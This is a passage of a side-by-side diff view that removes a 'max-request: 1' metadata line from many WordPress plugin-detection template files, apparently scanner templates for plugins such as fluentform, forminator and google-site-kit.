plugin_namespace: elementskit-lite plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/enable-media-replace/ - https://wordpress.org/plugins/enable-media-replace/
metadata: metadata:
max-request: 1
plugin_namespace: enable-media-replace plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/envato-elements/ - https://wordpress.org/plugins/envato-elements/
metadata: metadata:
max-request: 1
plugin_namespace: envato-elements plugin_namespace: envato-elements
wpscan: https://wpscan.com/plugin/envato-elements wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/ - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata: metadata:
max-request: 1
plugin_namespace: essential-addons-for-elementor-lite plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/ewww-image-optimizer/ - https://wordpress.org/plugins/ewww-image-optimizer/
metadata: metadata:
max-request: 1
plugin_namespace: ewww-image-optimizer plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/ - https://wordpress.org/plugins/facebook-for-woocommerce/
metadata: metadata:
max-request: 1
plugin_namespace: facebook-for-woocommerce plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/fast-indexing-api/ - https://wordpress.org/plugins/fast-indexing-api/
metadata: metadata:
max-request: 1
plugin_namespace: fast-indexing-api plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/ - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata: metadata:
max-request: 1
plugin_namespace: favicon-by-realfavicongenerator plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/flamingo/ - https://wordpress.org/plugins/flamingo/
metadata: metadata:
max-request: 1
plugin_namespace: flamingo plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/fluentform/ - https://wordpress.org/plugins/fluentform/
metadata: metadata:
max-request: 1
plugin_namespace: fluentform plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/font-awesome/ - https://wordpress.org/plugins/font-awesome/
metadata: metadata:
max-request: 1
plugin_namespace: font-awesome plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/ - https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata: metadata:
max-request: 1
plugin_namespace: force-regenerate-thumbnails plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/formidable/ - https://wordpress.org/plugins/formidable/
metadata: metadata:
max-request: 1
plugin_namespace: formidable plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/forminator/ - https://wordpress.org/plugins/forminator/
metadata: metadata:
max-request: 1
plugin_namespace: forminator plugin_namespace: forminator
wpscan: https://wpscan.com/plugin/forminator wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/ga-google-analytics/ - https://wordpress.org/plugins/ga-google-analytics/
metadata: metadata:
max-request: 1
plugin_namespace: ga-google-analytics plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/ - https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata: metadata:
max-request: 1
plugin_namespace: gdpr-cookie-compliance plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata: metadata:
max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/ - https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata: metadata:
max-request: 1
plugin_namespace: google-analytics-for-wordpress plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/google-listings-and-ads/ - https://wordpress.org/plugins/google-listings-and-ads/
metadata: metadata:
max-request: 1
plugin_namespace: google-listings-and-ads plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/google-site-kit/ - https://wordpress.org/plugins/google-site-kit/
metadata: metadata:
max-request: 1
plugin_namespace: google-site-kit plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/google-sitemap-generator/ - https://wordpress.org/plugins/google-sitemap-generator/
metadata: metadata:
max-request: 1
plugin_namespace: google-sitemap-generator plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200 tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,7 +7,6 @@ info:
reference: reference:
- https://wordpress.org/plugins/gtranslate/ - https://wordpress.org/plugins/gtranslate/
metadata: metadata:
max-request: 1
plugin_namespace: gtranslate plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200 tags: tech,wordpress,wp-plugin,top-200

Some files were not shown because too many files have changed in this diff Show More